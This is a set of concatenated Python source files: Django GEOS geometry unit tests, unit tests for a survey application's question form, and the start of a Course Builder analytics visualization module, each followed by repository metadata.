"Testing the length property."
# Points have 0 length.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.length)
# Should be ~ sqrt(2)
ls = LineString((0, 0), (1, 1))
self.assertAlmostEqual(1.41421356237, ls.length, 11)
# Should be circumference of Polygon
poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
self.assertEqual(4.0, poly.length)
# Should be sum of each element's length in collection.
mpoly = MultiPolygon(poly.clone(), poly)
self.assertEqual(8.0, mpoly.length)
def test_emptyCollections(self):
"Testing empty geometries and collections."
geoms = [
GeometryCollection([]),
fromstr('GEOMETRYCOLLECTION EMPTY'),
GeometryCollection(),
fromstr('POINT EMPTY'),
Point(),
fromstr('LINESTRING EMPTY'),
LineString(),
fromstr('POLYGON EMPTY'),
Polygon(),
fromstr('MULTILINESTRING EMPTY'),
MultiLineString(),
fromstr('MULTIPOLYGON EMPTY'),
MultiPolygon(()),
MultiPolygon(),
]
if numpy:
geoms.append(LineString(numpy.array([])))
for g in geoms:
self.assertIs(g.empty, True)
# Testing len() and num_geom.
if isinstance(g, Polygon):
self.assertEqual(1, len(g)) # Has one empty linear ring
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g[0]))
elif isinstance(g, (Point, LineString)):
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g))
else:
self.assertEqual(0, g.num_geom)
self.assertEqual(0, len(g))
# Testing __getitem__ (doesn't work on Point or Polygon)
if isinstance(g, Point):
# IndexError is not raised in GEOS 3.8.0.
if geos_version_tuple() != (3, 8, 0):
with self.assertRaises(IndexError):
g.x
elif isinstance(g, Polygon):
lr = g.shell
self.assertEqual('LINEARRING EMPTY', lr.wkt)
self.assertEqual(0, len(lr))
self.assertIs(lr.empty, True)
with self.assertRaises(IndexError):
lr.__getitem__(0)
else:
with self.assertRaises(IndexError):
g.__getitem__(0)
def test_collection_dims(self):
gc = GeometryCollection([])
self.assertEqual(gc.dims, -1)
gc = GeometryCollection(Point(0, 0))
self.assertEqual(gc.dims, 0)
gc = GeometryCollection(LineString((0, 0), (1, 1)), Point(0, 0))
self.assertEqual(gc.dims, 1)
gc = GeometryCollection(LineString((0, 0), (1, 1)), Polygon(((0, 0), (0, 1), (1, 1), (0, 0))), Point(0, 0))
self.assertEqual(gc.dims, 2)
def test_collections_of_collections(self):
"Testing GeometryCollection handling of other collections."
# Creating a GeometryCollection WKT string composed of other
# collections and polygons.
coll = [mp.wkt for mp in self.geometries.multipolygons if mp.valid]
coll.extend(mls.wkt for mls in self.geometries.multilinestrings)
coll.extend(p.wkt for p in self.geometries.polygons)
coll.extend(mp.wkt for mp in self.geometries.multipoints)
gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)
# Should construct ok from WKT
gc1 = GEOSGeometry(gc_wkt)
# Should also construct ok from individual geometry arguments.
gc2 = GeometryCollection(*tuple(g for g in gc1))
# And, they should be equal.
self.assertEqual(gc1, gc2)
def test_gdal(self):
"Testing `ogr` and `srs` properties."
g1 = fromstr('POINT(5 23)')
self.assertIsInstance(g1.ogr, gdal.OGRGeometry)
self.assertIsNone(g1.srs)
g1_3d = fromstr('POINT(5 23 8)')
self.assertIsInstance(g1_3d.ogr, gdal.OGRGeometry)
self.assertEqual(g1_3d.ogr.z, 8)
g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
self.assertIsInstance(g2.ogr, gdal.OGRGeometry)
self.assertIsInstance(g2.srs, gdal.SpatialReference)
self.assertEqual(g2.hex, g2.ogr.hex)
self.assertEqual('WGS 84', g2.srs.name)
def test_copy(self):
"Testing use with the Python `copy` module."
import copy
poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
cpy1 = copy.copy(poly)
cpy2 = copy.deepcopy(poly)
self.assertNotEqual(poly._ptr, cpy1._ptr)
self.assertNotEqual(poly._ptr, cpy2._ptr)
def test_transform(self):
"Testing `transform` method."
orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using a srid, a SpatialReference object, and a CoordTransform object
# for transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(gdal.SpatialReference('EPSG:2774'))
ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
# Different PROJ versions use different transformations, all are
# correct as having a 1 meter accuracy.
prec = -1
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test_transform_3d(self):
p3d = GEOSGeometry('POINT (5 23 100)', 4326)
p3d.transform(2774)
self.assertAlmostEqual(p3d.z, 100, 3)
def test_transform_noop(self):
""" Testing `transform` method (SRID match) """
# transform() should no-op if source & dest SRIDs match,
# regardless of whether GDAL is available.
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
gt = g.tuple
g.transform(4326)
self.assertEqual(g.tuple, gt)
self.assertEqual(g.srid, 4326)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
g1 = g.transform(4326, clone=True)
self.assertEqual(g1.tuple, g.tuple)
self.assertEqual(g1.srid, 4326)
self.assertIsNot(g1, g, "Clone didn't happen")
def test_transform_nosrid(self):
""" Testing `transform` method (no SRID or negative SRID) """
g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
with self.assertRaises(GEOSException):
g.transform(2774)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
with self.assertRaises(GEOSException):
g.transform(2774, clone=True)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
with self.assertRaises(GEOSException):
g.transform(2774)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
with self.assertRaises(GEOSException):
g.transform(2774, clone=True)
def test_extent(self):
"Testing `extent` method."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
pnt = Point(5.23, 17.8)
# Extent of points is just the point itself repeated.
self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
# Testing on the 'real world' Polygon.
poly = fromstr(self.geometries.polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test_pickle(self):
"Testing pickling and unpickling support."
# Creating a list of test geometries for pickling,
# and setting the SRID on some of them.
def get_geoms(lst, srid=None):
return [GEOSGeometry(tg.wkt, srid) for tg in lst]
tgeoms = get_geoms(self.geometries.points)
tgeoms.extend(get_geoms(self.geometries.multilinestrings, 4326))
tgeoms.extend(get_geoms(self.geometries.polygons, 3084))
tgeoms.extend(get_geoms(self.geometries.multipolygons, 3857))
tgeoms.append(Point(srid=4326))
tgeoms.append(Point())
for geom in tgeoms:
s1 = pickle.dumps(geom)
g1 = pickle.loads(s1)
self.assertEqual(geom, g1)
self.assertEqual(geom.srid, g1.srid)
def test_prepared(self):
"Testing PreparedGeometry support."
# Creating a simple multipolygon and getting a prepared version.
mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
prep = mpoly.prepared
# A set of test points.
pnts = [Point(5, 5), Point(7.5, 7.5), Point(2.5, 7.5)]
for pnt in pnts:
# Results should be the same (but faster)
self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
self.assertEqual(mpoly.covers(pnt), prep.covers(pnt))
self.assertTrue(prep.crosses(fromstr('LINESTRING(1 1, 15 15)')))
self.assertTrue(prep.disjoint(Point(-5, -5)))
poly = Polygon(((-1, -1), (1, 1), (1, 0), (-1, -1)))
self.assertTrue(prep.overlaps(poly))
poly = Polygon(((-5, 0), (-5, 5), (0, 5), (-5, 0)))
self.assertTrue(prep.touches(poly))
poly = Polygon(((-1, -1), (-1, 11), (11, 11), (11, -1), (-1, -1)))
self.assertTrue(prep.within(poly))
# Original geometry deletion should not crash the prepared one (#21662)
del mpoly
self.assertTrue(prep.covers(Point(5, 5)))
def test_line_merge(self):
"Testing line merge support"
ref_geoms = (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
)
ref_merged = (fromstr('LINESTRING(1 1, 3 3)'),
fromstr('LINESTRING (1 1, 3 3, 4 2)'),
)
for geom, merged in zip(ref_geoms, ref_merged):
self.assertEqual(merged, geom.merged)
def test_valid_reason(self):
"Testing IsValidReason support"
g = GEOSGeometry("POINT(0 0)")
self.assertTrue(g.valid)
self.assertIsInstance(g.valid_reason, str)
self.assertEqual(g.valid_reason, "Valid Geometry")
g = GEOSGeometry("LINESTRING(0 0, 0 0)")
self.assertFalse(g.valid)
self.assertIsInstance(g.valid_reason, str)
self.assertTrue(g.valid_reason.startswith("Too few points in geometry component"))
def test_linearref(self):
"Testing linear referencing"
ls = fromstr('LINESTRING(0 0, 0 10, 10 10, 10 0)')
mls = fromstr('MULTILINESTRING((0 0, 0 10), (10 0, 10 10))')
self.assertEqual(ls.project(Point(0, 20)), 10.0)
self.assertEqual(ls.project(Point(7, 6)), 24)
self.assertEqual(ls.project_normalized(Point(0, 20)), 1.0 / 3)
self.assertEqual(ls.interpolate(10), Point(0, 10))
self.assertEqual(ls.interpolate(24), Point(10, 6))
self.assertEqual(ls.interpolate_normalized(1.0 / 3), Point(0, 10))
self.assertEqual(mls.project(Point(0, 20)), 10)
self.assertEqual(mls.project(Point(7, 6)), 16)
self.assertEqual(mls.interpolate(9), Point(0, 9))
self.assertEqual(mls.interpolate(17), Point(10, 7))
def test_deconstructible(self):
"""
Geometry classes should be deconstructible.
"""
point = Point(4.337844, 50.827537, srid=4326)
path, args, kwargs = point.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.point.Point')
self.assertEqual(args, (4.337844, 50.827537))
self.assertEqual(kwargs, {'srid': 4326})
ls = LineString(((0, 0), (1, 1)))
path, args, kwargs = ls.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.linestring.LineString')
self.assertEqual(args, (((0, 0), (1, 1)),))
self.assertEqual(kwargs, {})
ls2 = LineString([Point(0, 0), Point(1, 1)], srid=4326)
path, args, kwargs = ls2.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.linestring.LineString')
self.assertEqual(args, ([Point(0, 0), Point(1, 1)],))
self.assertEqual(kwargs, {'srid': 4326})
ext_coords = ((0, 0), (0, 1), (1, 1), (1, 0), (0, 0))
int_coords = ((0.4, 0.4), (0.4, 0.6), (0.6, 0.6), (0.6, 0.4), (0.4, 0.4))
poly = Polygon(ext_coords, int_coords)
path, args, kwargs = poly.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.polygon.Polygon')
self.assertEqual(args, (ext_coords, int_coords))
self.assertEqual(kwargs, {})
lr = LinearRing((0, 0), (0, 1), (1, 1), (0, 0))
path, args, kwargs = lr.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.linestring.LinearRing')
self.assertEqual(args, ((0, 0), (0, 1), (1, 1), (0, 0)))
self.assertEqual(kwargs, {})
mp = MultiPoint(Point(0, 0), Point(1, 1))
path, args, kwargs = mp.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.MultiPoint')
self.assertEqual(args, (Point(0, 0), Point(1, 1)))
self.assertEqual(kwargs, {})
ls1 = LineString((0, 0), (1, 1))
ls2 = LineString((2, 2), (3, 3))
mls = MultiLineString(ls1, ls2)
path, args, kwargs = mls.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.MultiLineString')
self.assertEqual(args, (ls1, ls2))
self.assertEqual(kwargs, {})
p1 = Polygon(((0, 0), (0, 1), (1, 1), (0, 0)))
p2 = Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
mp = MultiPolygon(p1, p2)
path, args, kwargs = mp.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.MultiPolygon')
self.assertEqual(args, (p1, p2))
self.assertEqual(kwargs, {})
poly = Polygon(((0, 0), (0, 1), (1, 1), (0, 0)))
gc = GeometryCollection(Point(0, 0), MultiPoint(Point(0, 0), Point(1, 1)), poly)
path, args, kwargs = gc.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.GeometryCollection')
self.assertEqual(args, (Point(0, 0), MultiPoint(Point(0, 0), Point(1, 1)), poly))
self.assertEqual(kwargs, {})
def test_subclassing(self):
"""
GEOSGeometry subclass may itself be subclassed without being forced-cast
to the parent class during `__init__`.
"""
class ExtendedPolygon(Polygon):
def __init__(self, *args, data=0, **kwargs):
super().__init__(*args, **kwargs)
self._data = data
def __str__(self):
return "EXT_POLYGON - data: %d - %s" % (self._data, self.wkt)
ext_poly = ExtendedPolygon(((0, 0), (0, 1), (1, 1), (0, 0)), data=3)
self.assertEqual(type(ext_poly), ExtendedPolygon)
# ExtendedPolygon.__str__ should be called (instead of Polygon.__str__).
self.assertEqual(str(ext_poly), "EXT_POLYGON - data: 3 - POLYGON ((0 0, 0 1, 1 1, 0 0))")
self.assertJSONEqual(
ext_poly.json,
'{"coordinates": [[[0, 0], [0, 1], [1, 1], [0, 0]]], "type": "Polygon"}',
)
def test_geos_version_tuple(self):
versions = (
(b'3.0.0rc4-CAPI-1.3.3', (3, 0, 0)),
(b'3.0.0-CAPI-1.4.1', (3, 0, 0)),
(b'3.4.0dev-CAPI-1.8.0', (3, 4, 0)),
(b'3.4.0dev-CAPI-1.8.0 r0', (3, 4, 0)),
(b'3.6.2-CAPI-1.10.2 4d2925d6', (3, 6, 2)),
)
for version_string, version_tuple in versions:
with self.subTest(version_string=version_string):
with mock.patch('django.contrib.gis.geos.libgeos.geos_version', lambda: version_string):
self.assertEqual(geos_version_tuple(), version_tuple)
def test_from_gml(self):
self.assertEqual(
GEOSGeometry('POINT(0 0)'),
GEOSGeometry.from_gml(
'<gml:Point gml:id="p21" srsName="http://www.opengis.net/def/crs/EPSG/0/4326">'
' <gml:pos srsDimension="2">0 0</gml:pos>'
'</gml:Point>'
),
)
def test_from_ewkt(self):
self.assertEqual(GEOSGeometry.from_ewkt('SRID=1;POINT(1 1)'), Point(1, 1, srid=1))
self.assertEqual(GEOSGeometry.from_ewkt('POINT(1 1)'), Point(1, 1))
def test_from_ewkt_empty_string(self):
msg = 'Expected WKT but got an empty string.'
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('')
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('SRID=1;')
def test_from_ewkt_invalid_srid(self):
msg = 'EWKT has invalid SRID part.'
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('SRUD=1;POINT(1 1)')
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('SRID=WGS84;POINT(1 1)')
def test_fromstr_scientific_wkt(self):
self.assertEqual(GEOSGeometry('POINT(1.0e-1 1.0e+1)'), Point(.1, 10))
def test_normalize(self):
g = MultiPoint(Point(0, 0), Point(2, 2), Point(1, 1))
self.assertIsNone(g.normalize())
self.assertTrue(g.equals_exact(MultiPoint(Point(2, 2), Point(1, 1), Point(0, 0))))
def test_empty_point(self):
p = Point(srid=4326)
self.assertEqual(p.ogr.ewkt, p.ewkt)
self.assertEqual(p.transform(2774, clone=True), Point(srid=2774))
p.transform(2774)
self.assertEqual(p, Point(srid=2774))
def test_linestring_iter(self):
ls = LineString((0, 0), (1, 1))
it = iter(ls)
# Step into CoordSeq iterator.
next(it)
ls[:] = []
with self.assertRaises(IndexError):
next(it)
| {
"content_hash": "6ec871573ec70e87faa910bb3da28ba2",
"timestamp": "",
"source": "github",
"line_count": 1449,
"max_line_length": 115,
"avg_line_length": 40.50310559006211,
"alnum_prop": 0.5701920291707134,
"repo_name": "koordinates/django",
"id": "d1496a3b3eae1ac2ec198afad1fabc22f1a16b86",
"size": "58689",
"binary": false,
"copies": "1",
"ref": "refs/heads/stable/3.2.x-kx",
"path": "tests/gis_tests/geos_tests/test_geos.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "84917"
},
{
"name": "HTML",
"bytes": "223820"
},
{
"name": "JavaScript",
"bytes": "139791"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Python",
"bytes": "14472067"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "142"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from survey.forms.question import *
from survey.models import Batch
from survey.models.question import Question
from survey.models.householdgroups import HouseholdMemberGroup
class QuestionFormTest(TestCase):
def setUp(self):
self.batch = Batch.objects.create(name='Batch A',description='description')
self.household_member_group = HouseholdMemberGroup.objects.create(name='Age 4-5', order=1)
self.question_module = QuestionModule.objects.create(name="Education")
self.form_data = {
'batch': self.batch.id,
'text': 'whaat?',
'answer_type': Question.NUMBER,
'identifier': 'ID 1',
'options':"some option text",
'group' : self.household_member_group.id,
'module' : self.question_module.id
}
def test_valid(self):
question_form = QuestionForm(self.form_data)
question_form.is_valid()
self.assertTrue(question_form.is_valid())
def test_invalid(self):
question_form = QuestionForm()
self.assertFalse(question_form.is_valid())
def test_question_form_fields(self):
question_form = QuestionForm()
fields = ['module', 'text', 'answer_type', 'group']
[self.assertIn(field, question_form.fields) for field in fields]
def test_question_form_has_tuple_of_all_question_modules_as_choices(self):
health_module = QuestionModule.objects.create(name="Health")
education_module = QuestionModule.objects.create(name="Education")
question_modules = [health_module, education_module]
question_form = QuestionForm()
[self.assertIn((module.id, module.name), question_form.fields['module'].choices) for module in question_modules]
def test_question_form_has_no_choices_if_there_are_no_question_modules(self):
QuestionModule.objects.all().delete()
question_form = QuestionForm()
self.assertEqual(0, len(question_form.fields['module'].choices))
def test_should_know_household_member_group_id_and_name_tuple_is_the_group_choice(self):
question_form = QuestionForm(self.form_data)
self.assertEqual(question_form.fields['group'].choices, [(self.household_member_group.id, self.household_member_group.name)])
def test_should_not_save_multichoice_question_if_no_options_given(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=''
question_form = QuestionForm(form_data)
self.assertFalse(question_form.is_valid())
expected_form_error = 'Question Options missing.'
self.assertEqual(1, len(question_form.errors['answer_type']))
self.assertEqual(expected_form_error, question_form.errors['answer_type'][0])
def test_should_save_options_and_batch_attached_to_questions_if_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=['option 1', 'option 2']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
batch = Batch.objects.create()
question = question_form.save(batch=batch, group=[self.household_member_group.id])
self.assertEqual(1, question.batches.all().count())
self.assertEqual(batch, question.batches.all()[0])
options = question.options.all()
self.assertEqual(2, options.count())
self.assertIn(QuestionOption.objects.get(text=form_data['options'][0]), options)
self.assertIn(QuestionOption.objects.get(text=form_data['options'][0]), options)
def test_should_save_questions_and_options_even_if_batch_is_not_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=['option 1', 'option 2']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
question = question_form.save(group=[self.household_member_group.id])
self.assertEqual(0, len(question.batches.all()))
options = question.options.all()
self.assertEqual(2, options.count())
self.assertIn(QuestionOption.objects.get(text=form_data['options'][0]), options)
self.assertIn(QuestionOption.objects.get(text=form_data['options'][0]), options)
def test_should_edit_options_text_and_order_of_question_if_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=['option 1', 'option 2']
question_form = QuestionForm(form_data)
question = question_form.save(group=[self.household_member_group.id])
form_data['options'] = ['option 2', 'option aaaaaaa 1']
question_form = QuestionForm(instance=question, data=form_data)
edited_question = question_form.save(group=[self.household_member_group.id])
options = question.options.all()
self.assertEqual(2, options.count())
self.assertEqual(QuestionOption.objects.get(text=form_data['options'][0], order=1), options[0])
self.assertEqual(QuestionOption.objects.get(text=form_data['options'][1], order=2), options[1])
self.failIf(QuestionOption.objects.filter(text='options 1'))
self.assertEqual(question.id, edited_question.id)
def test_should_not_save_options_if_not_multichoice_even_if_options_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.TEXT
form_data['options']=['some option question']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
question = question_form.save(group=[self.household_member_group.id])
self.assertEqual(0, question.batches.all().count())
self.assertEquals(0, question.options.all().count())
def test_should_filter_options_not_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.TEXT
del form_data['options']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
question = question_form.save(group=[self.household_member_group.id])
self.assertEqual(0, question.batches.all().count())
self.assertEquals(0, question.options.all().count())
def test_form_should_not_be_valid_for_subquestion_if_same_subquestion_already_exist(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
sub_question = Question.objects.create(text="this is a sub question", answer_type=Question.NUMBER,
subquestion=True, parent=question, group=self.household_member_group,
identifier='Q2')
question.batches.add(self.batch)
sub_question.batches.add(self.batch)
form_data = self.form_data.copy()
form_data['text'] = sub_question.text
form_data['answer_type'] = sub_question.answer_type
del form_data['options']
question_form = QuestionForm(data=form_data, parent_question=sub_question.parent)
self.assertFalse(question_form.is_valid())
message= "Sub question for this question with this text already exists."
self.assertIn(message, question_form.errors.values()[0])
def test_form_has_parent_groups_only_if_parent_question_is_supplied(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question_form = QuestionForm(parent_question=question)
self.assertIn((self.household_member_group.id, self.household_member_group.name), question_form.fields['group'].choices)
self.assertNotIn((another_member_group.id, another_member_group.name), question_form.fields['group'].choices)
def test_form_has_no_groups_only_if_parent_question_has_no_group_and_is_supplied(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1, identifier='Q1')
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question_form = QuestionForm(parent_question=question)
self.assertNotIn((self.household_member_group.id, self.household_member_group.name), question_form.fields['group'].choices)
self.assertNotIn((another_member_group.id, another_member_group.name), question_form.fields['group'].choices)
def test_form_has_all_groups_only_if_no_parent_question_is_supplied(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question_form = QuestionForm()
self.assertIn((self.household_member_group.id, self.household_member_group.name), question_form.fields['group'].choices)
self.assertIn((another_member_group.id, another_member_group.name), question_form.fields['group'].choices)
def test_form_is_invalid_if_parent_question_group_is_different_from_subquestion_group(self):
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=another_member_group, identifier='Q1')
question_form = QuestionForm(parent_question=question, data=self.form_data)
self.assertFalse(question_form.is_valid())
error_message = "Subquestions cannot have a different group from its parent."
self.assertEqual([error_message], question_form.errors['group'])
def test_form_is_invalid_if_module_not_selected(self):
form_data = self.form_data.copy()
form_data['module'] = ''
question_form = QuestionForm(form_data)
self.assertFalse(question_form.is_valid())
def test_form_has_parent_module_only_if_parent_question_has_one(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
module=self.question_module, identifier='Q1')
another_module = QuestionModule.objects.create(name="haha")
question_form = QuestionForm(parent_question=question)
self.assertIn((self.question_module.id, self.question_module.name), question_form.fields['module'].choices)
self.assertNotIn((another_module.id, another_module.name), question_form.fields['module'].choices)
def test_form_has_all_module_if_parent_question_has_no_module(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
identifier='Q1')
another_module = QuestionModule.objects.create(name="haha")
question_form = QuestionForm(parent_question=question)
self.assertEqual(2, len(question_form.fields['module'].choices))
self.assertIn((self.question_module.id, self.question_module.name), question_form.fields['module'].choices)
self.assertIn((another_module.id, another_module.name), question_form.fields['module'].choices)
def test_form_has_all_module_if_parent_question_is_not_supplied(self):
another_module = QuestionModule.objects.create(name="haha")
question_form = QuestionForm()
self.assertEqual(2, len(question_form.fields['module'].choices))
self.assertIn((self.question_module.id, self.question_module.name), question_form.fields['module'].choices)
self.assertIn((another_module.id, another_module.name), question_form.fields['module'].choices)
def test_form_is_invalid_if_parent_question_module_is_different_from_subquestion_module(self):
another_module = QuestionModule.objects.create(name="haha")
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
module=another_module, identifier='Q1')
question_form = QuestionForm(parent_question=question, data=self.form_data)
self.assertFalse(question_form.is_valid())
error_message = "Subquestions cannot have a different module from its parent."
self.assertEqual([error_message], question_form.errors['module'])
def test_form_is_invalid_if_trying_to_add_duplicate_subquestion_under_question(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
sub_question_data = {'text': 'Subquestion 1?',
'answer_type':Question.NUMBER,
'group': self.household_member_group,
'identifier': 'ID 1',
'subquestion': True,
'parent': question}
sub_question = Question.objects.create(**sub_question_data)
error_message = 'Sub question for this question with this text already exists.'
sub_question_data['group'] = self.household_member_group.id
question_form = QuestionForm(parent_question=question, data=sub_question_data)
is_valid = question_form.is_valid()
self.assertFalse(is_valid)
self.assertIn(error_message, question_form.errors['text'])
| {
"content_hash": "b23323446df361ccad2a9be0e05e5a2e",
"timestamp": "",
"source": "github",
"line_count": 265,
"max_line_length": 133,
"avg_line_length": 52.87924528301887,
"alnum_prop": 0.6594590737172625,
"repo_name": "unicefuganda/mics",
"id": "bdd5685f827f79d0c672e0b7013890db6f994b00",
"size": "14013",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "survey/tests/forms/test_questions_form.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "37725"
},
{
"name": "JavaScript",
"bytes": "390607"
},
{
"name": "Python",
"bytes": "5209696"
},
{
"name": "Shell",
"bytes": "1277"
}
],
"symlink_target": ""
} |
"""Module providing public analytics interfaces."""
__author__ = 'Mike Gainer (mgainer@google.com)'
import re
import jinja2
from common import crypto
from controllers import utils as controllers_utils
from models.analytics import display
from models.analytics import utils as analytics_utils
from models import data_sources
from models import transforms
class Visualization(object):
registry = {}
def __init__(self, name, title, html_template_name,
data_source_classes=None):
"""Establish a new visualization.
Args:
name: Valid Javascript identifier to be used for this visualization
when generating scripts via templates.
title: Section title for visualization on the
Dashboard -> Analytics page.
html_template_name: Name of a file which contains a Jinja template
which will be used to generate a chart or graph for the
visualization. This can be specified as a path relative to
the CB installation root
(e.g. 'modules/my_new_module/my_visualization.html'), or
relative to any of the data sources or generators used for the
visualization (meaning you can just use the name of the HTML
file without any path components if it's in the same
directory).
data_source_classes: An optional array of data source classes.
This should contain only classes inheriting from
data_sources.base_types._DataSource.
Raises:
ValueError: when any of
- name is already registered as an visualization
- name is not a valid JavaScript identifier.
- a data source class is not registered with the data_sources
module.
"""
if name and not re.match('^[_0-9a-z]+$', name):
raise ValueError(
'name "%s" must contain only lowercase letters, ' % name +
'numbers or underscore characters')
if name in self.registry:
raise ValueError(
'Visualization %s is already registered' % name)
data_source_classes = data_source_classes or []
for data_source_class in data_source_classes:
if not data_sources.Registry.is_registered(data_source_class):
raise ValueError(
'All data source classes used in visualizations must be '
'registered in models.data_sources.Registry; '
'"%s" is not registered.' % data_source_class.__name__)
self._name = name
self._title = title
self._template_name = html_template_name
self._data_source_classes = data_source_classes
self.registry[name] = self
@property
def name(self):
return self._name
@property
def title(self):
return self._title
@property
def template_name(self):
return self._template_name
@property
def generator_classes(self):
ret = set()
for source_class in self.data_source_classes:
ret.update(source_class.required_generators())
return ret
@property
def data_source_classes(self):
return set(self._data_source_classes)
@property
def rest_data_source_classes(self):
return set([c for c in self._data_source_classes
if issubclass(c, data_sources.AbstractRestDataSource)])
@classmethod
def for_name(cls, name):
return cls.registry.get(name)
class _TemplateRenderer(object):
"""Insulate display code from knowing about handlers and Jinja.
This abstraction makes unit testing simpler, as well as decouples
the display code from being directly dependent on web-request
handler types.
"""
def __init__(self, handler):
self._handler = handler
def render(self, visualization, template_name, template_values):
# pylint: disable=protected-access
template_dirs = analytics_utils._get_template_dir_names(visualization)
if hasattr(self._handler, 'ADDITIONAL_DIRS'):
template_dirs.extend(self._handler.ADDITIONAL_DIRS)
return jinja2.utils.Markup(
self._handler.get_template(template_name, template_dirs).render(
template_values, autoescape=True))
def get_base_href(self):
return controllers_utils.ApplicationHandler.get_base_href(self._handler)
def get_current_url(self):
return self._handler.request.url
def generate_display_html(handler, xsrf_creator, visualizations):
"""Generate sections of HTML representing each visualization.
This generates multiple small HTML sections which are intended for
inclusion as-is into a larger display (specifically, the dashboard
page showing visualizations). The HTML will likely contain JavaScript
elements that induce callbacks from the page to the REST service
providing JSON data.
Args:
handler: Must be derived from controllers.utils.ApplicationHandler.
Used to load HTML templates and to establish page context
for learning the course to which to restrict data loading.
xsrf_creator: Thing which can create XSRF tokens by exposing
a create_token(token_name) method. Normally, set this
to common.crypto.XsrfTokenManager. Unit tests use a
bogus creator to avoid DB requirement.
Returns:
